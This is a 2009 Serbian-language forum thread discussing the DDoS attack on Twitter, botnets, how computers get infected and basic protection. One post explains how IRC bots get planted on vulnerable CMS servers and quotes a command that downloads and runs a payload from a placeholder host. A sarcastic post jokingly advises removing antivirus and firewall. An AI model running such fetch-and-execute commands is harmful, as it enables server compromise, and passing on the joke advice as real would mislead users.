Cudno, na nalogu Kozanostre je pisalo da je CIA kriva :)




_{[Ovu poruku je menjao Milan Gligorijevic dana 08.08.2009. u 17:25 GMT+1]}

ja već dva dana uopšte ne mogu da update-ujem status na twitter-u... ni kroz web ni kroz 3rd party aplikacije... tj. jednom mi je samo uspelo kroz Digsby

Ruski hax0ri su zeznuta ekipa...

Pre par godina zbog gluposti jednog ex-moderatora ES-a (koji je mislio da se neki Rus sa korisnickim imenom "Vodka" na forumu zeza) je pukao ES server, a ubrzo zatim i ceo Verat ISP - u pitanju je bila demonstracija usluga koje Rusi pruzaju (mislim da je bilo nesto tipa 10K EUR za drzanje sajta nedostupnim jedan dan :-)

Njihova moc se sastoji u kontroli ogromnog broja inficiranih kompova sirom sveta... Inace voleo bih da se racuni za downtime isporuce Microsoftu koji je zbog njihove ActiveX tehnologije i ocajnog stava prema sigurnosti sve do 2003 (kada su konacno poceli da se bave time ozbiljno) u stvari i omogucio ovo.

Uzgred, Twitter je servis na vrlo malom serverskom kapacitetu - kako Twitter ne pravi neku lovu, oni ne mogu da obezbede redudantnu infrastrukturu kao neki Google, Microsoft ili Amazon.

Zbog toga, ako ih Rusi zaista uzmu na "zub", mogu vrlo dugo da budu nedostupni :-)

Licno mislim da i nije neka steta :-)



_{[Ovu poruku je menjao Gojko Vujovic dana 09.08.2009. u 21:26 GMT+1]}

Titter je vrlo neophodna stvar u zivotu, kao i Fejsbuk ... sto je lepo kad neko zaradjuje pare na tudjem gubljenju vremena

Umeju da budu :)


Pa, ne bih sad bas to nazvao gluposcu, bila je to ocekivana reakcija a posledice su vrlo lako mogle da se dogode i bez toga. Inace, nesto mi u secanju stoji cifra od 4000 eura.


Hoces da kazes da je taj botnet star preko 6 godina? Ne izgleda mi kao verovatno...

word.

I ovo treba da bude udarna vest na index strani ES-a, big deal.

Nisam rekao da je u pitanju isti botnet - sigurno ih ima koliko god hoces, jer je Rusija idealna zemlja za takve stvari zbog specificnog legalnog aparata koga bole q za te stvari (zaradjivanje love hakerisanjem) - i Srbija je bila takva pre 10-tak godina, samo nije imala ni infrastrukturu ni dovoljno pametnih krimosa da po tome bude poznata.

Ali onda za ove sada stvari ActiveX nije kriv :) (ako vec kazes da se tu promenila situacija 2003.)
Ispostavljati racune za ovakve stvari MS-u bi imalo smisla - u vreme dok jesu postojali problemi sa sigurnoscu u Windows-u, IE-u ili vec gde sve koji su to omogucili.

Sledeci je Facebook dace bog

I ja kazem brate moj dace bog da sva ta sr4nja po`obaraju

Kad bi sva sránja po internetu poobarali, ostalo bi vrlo malo sajtova za pogledati :-).

A najveće njesra su upravo ti hakeri. Žao mi je što su svojim postojanjem potpuno upropastili i samu reč "haker", koja je nekada imala potpuno pozitivno značenje.

A vazda se ne secam kad je rec haker imala pozitivno znacenje u sirokim narodnim masama.

Ljudi, samo nemoj da se zameramo Rusima (a i Kinezima)!
Kad drze amere u shaci koji su izmislili celo ovo digitalno ludilo sta smo mi za njih.

Naime, njihov zakon o autorskim pravima, pisan pre nekoliko decenija dok jos nije bilo internata i cd-ova, (koji otprilike ne zele da menjaju), igrom slucaja je pisan tako da naravno brani ruske autore ali zato totalno "ne poznaje" sve ostalo/e. Tamo je legalno kopirati sve ne-ruski jer zakon o tome "nema pojma".
Rusi su za 10 godina, nesporno toliko napredovali kao zemlja, bas u vreme expanzije interneta i globalnih mreza, da njima takva situacija totalno odgovara i tako ce da bude verovatno jos neko duze vreme. Naravno da ima pritisaka drugih zemalja na to, ali ko ce izaci sa tim na kraj i naterati nekog da menja zakon svoje drzave.

Osamdesetih godina, i delom devedesetih. Ja se sećam, tada sam bio haker. Doduše, i danas sam ali se to sada naziva geek, nerd, i slično. Mada ti novi izrazi imaju negativnu konotaciju što se tiče asocijalnosti, što nije bio slučaj sa terminom haker.

By the way, znaš, ti si rođen 1985 godine, a recimo prvi ikada izdat časopis koji se u Jugoslaviji bavio kompjuterima je specijalno izdanje časopisa galaksija koje se zvalo "Računari u vašoj kući". E, to specijalno izdanje je izašlo 1983 godine, i ja sam ga tada kupio jer sam jedva čekao da najzad neko u ovoj (onoj) zemlji počne da se bavi tehnologijom koja predstavlja budućnost. Imam ga još, evo tu je na 2m od mene, u fascikli.

Eto, sada si naučio nešto i o tome da prvi hakeri nisu bili ovakvi kakvi su sada.

Je l' mozes da mi posljes fotokopiju ili skeniran taj casopis, hteo bih i ja da budem haker?

Jel ti to mene z, ili šta?

Mogu da ti pošaljem par slika ako te zanima, ali teško da ćeš postati haker (geek, nerd) od toga

Naravno da se zezam :)

Hvala ti sto si me prosvetlio :)

Kad smo vec kod twittera: http://www.securityfocus.com/brief/995

Ovo ce da bude nocna mora :)

uklonite antivirus sa kompa, uklonite bilo koji oblik firewall-a , pogasite sve servise koji vam nisu neophodni i vas racunar je bezbedan od napada "lutajucih virusa i hakera" :)

To sa desetinom hiljada kompova sinhronizovanih je bas fino odradjen distributed programming.
Svaka cast za znanje, ali ne i za pravac....

ih bre Wajda.W, pa tih deset hiljada racunara je prethodno zarazeno nekom vrstom virusa koji moze da salje http zahteve, i onda su oni u jednom trenutku "naredili" tim virusima otvorite twitter.com (ili kako vec), npr. 10 racunara po 1000 naredbi nije mnogo, danas su brze veze :)

@glusac Nije mnogo, znam, danasnji clusteri imaju nebrojeno vise..., ali ipak nije to lako organizovati i odraditi...

i budu on line u isto vreme
zanimljivo

Nije tu nista specijalno fino niti tesko - svaki klijent ima komandu da krene da trazi po IP adresama druge klijente i da im prosledi istu naredbu. Znaci dovoljno je da napadac nadje prvog klijenta prostom pretragom IP adresa grubom silom, i onda cela stvar pocinje kao lancana reakcija.

Cela stvar uopste nije teska za izvesti jer su latencija i sinhronizacija potpuno irelevantne... tj. u ovom slucaju nisu potrebne. Tako da je sam algoritam izuzetno jednostavan.

Naravno sve ovo je potpomognuto gluposcu korisnika racunara danas, koji su doveli do toga da milioni racunara sirom sveta "neguju" kojekakve trojane. Ljudska glupost je jednostavno neunistiva.

--

Daleko spektakularnije stvari kod mnogih virusa/trojana je morfizam koda i ugradjene zastite od debugginga od strane AV kompanija, neki su cak u stanju i da onda narede DDoS na IP adresu racunara koji ih debaguje. Tu je skoncentrisana najveca pamet - u slucaju kada je ima.

Bas zanimljiva tema. Svaka cast autoru.

Ivane software koji se koristi za taj botnet je vrlo specifican zapravo to je trenutno high end trojan koji je u sustini rootkit za windows a glavna fora je kako ga spreaduju posto su velike pare u pitanju najvise ga spreaduju preko nekih servisa kojima plate odredjene pare da uz njihovu stvar prosvercuju i ovaj programcic koji radi kad zatreba. Cela ta ekipa je vrlo ozbiljna i velike su pare u igri, realno dosta korisnika ne ocekuje da se zarazi od nekih stvari koje legalno kupi tipa DVD :)

Sama pomisao da ljudi treba da crvkuću umesto da komuniciraju je blago rečeno - užasavajuća.
Ako. Neka. Sve ovo je dobro.

Mozete mi vi koji ste iskusni u radu na racunarima, da mi odgovorite kako oni to kontrolisu racunare. Znam da svaki haker moze da napadne koji god hoce racunar, ali da li je i dovoljno da korisnici paze sta posecuju na internetu, sta skidaju, koji imaju antivirus, koje programe...

Ja mislim da su i korisnici krivi u svoj toj situaciji. Vecina njih nije ni podesila privatnost na fejsbuku, twitteru i ostalim servisima. Koriste zastareli softver i samo klikcu ko ovcice po internetu. Mislim da bi bilo dobro da se kod nas izda neki prirucnik ministarstva ili da se napravi neka jedinstvena stranica za Srbiju na kojoj ce strucnjaci iz IT sektora preporucivati kako da se korisnici zastite na iternetu, ali kako i da zastite svoju privatnost na socijalnim servisima na internetu. Ja mislim da je bar polovina korisnika interneta nepismena, ali zbog toga sto ne znaju kako da koriste svoj racunar i internet na najbolji nacin.

Zanima me komentar vas iskusnijih korisnika

Moja analiza je bila iskljucivo fokusirana na tehnicki deo DDoS softvera - taj softver je relativno prost ako se izuzmu anti-debug mere koje postoje u nekim od trojana.

Naravno, distribucija istih virusa/trojana je ogroman biznis - bas kao i industrija SPAM-a... Ali, vidis - bas kao i za SPAM, procena je da jedan od manje od sto hiljada ljudi nesto kupi sa SPAM mail-a, pa se opet cela stvar isplati.

Trojanci su jos isplativiji jer se sa njima "pecaju" brojevi kreditnih kartica, socijalnog osiguranja, dolazi se do sifri za pristup online bankingu, licnih podataka itd...

Opet - kao sto rekoh, za postojanje toga se najvise mozemo zahvaliti tehnickoj nepismenosti prosecnog korisnika racunara - doduse, drugi deo krivice snosi Microsoft zbog skandalozno lose sigurnosti svojih operativnih sistema sve do kasne 2003-ce godine - a matorih instalacija XP-a, Win98-mice i sl.. imas koliko hoces.



Racunar se ne moze "kontrolisati" od strane hakera dok se ne inficira sa nekim trojancem / virusom. A to se moze uciniti na mali milion nacina:

1. Skidanjem izvrsnih fajlova sa "levih" sajtova (programa, igrica...)
2. Pakovanjem virusa/trojanaca na opticke medije gde ce ih korisnik izvrsiti ili sa AutoRun-om na starim verzijama Windows-a, ili ce kliknuti na njih

3. Slanjem mailova sa virusima/trojancima upakovanih kao "slike", "pornjava" i sl...

4. Koriscenjem propusta u softveru koji koristi korisnik - tipa Adobe Flash, IE, Firefox - ovo je najtezi deo za napraviti, ali i najtezi za uociti od strane korisnika

Itd...

Hvala na odgovoru

Znaci treba uraditi sledece da bi se ublazio ili sprecio napad virusa:

Skeniranje svakog flesa ili cd-a koji se ubaci u racunar
Skeniranje svakog fajla koji se skine sa interneta
Redovan apdejt softvera
Azuriranje Mozile, Opere, IE...
Redovno azuriranje antivirusa
Koriscenje jos jednog antimalware programa
Brisanje spam poruka

Sto se tice brisanja spam poruka, onda ni ne treba koristiti imejl postu provajdera i outlook express jer je najbolji nacin da se dobije virus, tj. najslabije filtriranje spam poruka

Ako je onda to velika vecina stvari koje treba uraditi, onda je samo krivica ljudi za veliki broj napada

Hvala na odgovoru

Pa i nije da nije mnogo...

Da bi bili sigurni da vas racunar nije zarazen nekim virusom koji napada druge racunare otvorite cmd i kucajte netstat ukoliko nadjete zahtev SYN_SEND na mnogo adresa, znaci da ste zarazeni.

Inace napraviti botnet je veoma jednostavno.. I ne zahteva neki filozofiju. Razlikuju se 2 vrste botnet obicnih korisnika (kucni racunari sa slabim uploadom do 1mbps) serveri sa 10,100 ili vise mbps uploada.

Za obaranje 1 sajta dovoljan vam je ponekad i 1 - 2 servera. Nema neke velike filozofije kako "zaraziti server" mnoge skripte ili CMS sistemi (joomla ili mambo itd..) imaju pristup pisanju u /tmp direktorijum gde upisuju sesije i stvari koje su im trenutno potrebne.

Sa rupom u kodu ljudi naprave exploit gde se uz odredjene http zahteve na CMS postavi bot koji se konektuje na irc mrezu i kontrolise se globalno ( botovi u jednom kanalu) primaju komande tipa .unixkomada. Recimo .wget http://IP/~test/stealth; .chmod +x stealth; ./stealth IP port

Ovo je veoma mocna alatka za napadanje. Krivci za ovaj propust na serveru su prvobitno autori cms sistema ali posto je to besplatan software na administratoru sistema je da se bolje zastiti od ovih upada. A da svoj server zastiti od mogucnosti da napada druge racunare najbolje je da doda pravilo u fw da zabrani slanje sa servera na sve portove a da dozvoli na one koji su potrebni.

Ovo je output kada pokusate da saljete sa servera, pokrenuo sam nmap, ip koji sam skenirao cu zamaskirati zvezdama.

sendto in send_ip_packet: sendto(5, packet, 44, 0, *.*.*.*, 16) => Operation not permitted
sendto in send_ip_packet: sendto(5, packet, 44, 0, *.*.*.*, 16) => Operation not permitted
sendto in send_ip_packet: sendto(5, packet, 44, 0, *.*.*.*, 16) => Operation not permitted
sendto in send_ip_packet: sendto(5, packet, 44, 0, *.*.*.*, 16) => Operation not permitted
sendto in send_ip_packet: sendto(5, packet, 44, 0, *.*.*.*, 16) => Operation not permitted


Ko nije znao nadam se da sada malo vise razume u vezi ovih napada. Jos jedna stvar mnogi ljudi mesaju DoS i DDoS napad je isti razlika je sto se prvi napad izvrsava sa 1 adrese a drugi napad je sinhronizovan napad (isto vreme u sekudni! :) ) vise adresa sto sama rec distributed govori.

Danijel,

Vrlo bitna stvar i najcesci ulaz virusa u kompove je softver sa torenta. I to nije samo do "crack.exe" nego i cab fajlovi ih sadrze, tako da su sakriveni od skeniranja antivirusima. Mene je do nedavno ubijao system proces jer je kernel time ponekad gurao na 100%, ni jedan antivirus nije mogao da provali kako i odakle ulazi. Uzmem desetak dana pred sebe, reinstaliram win 20-tak puta i otkrijem da se preko instalacija poweriso i winrar-a identican viruscic ugnezdi u system32 i radi samo njemu znane stvari i to iskljucivo u trenucima kad se graficka koristi intenzivnije.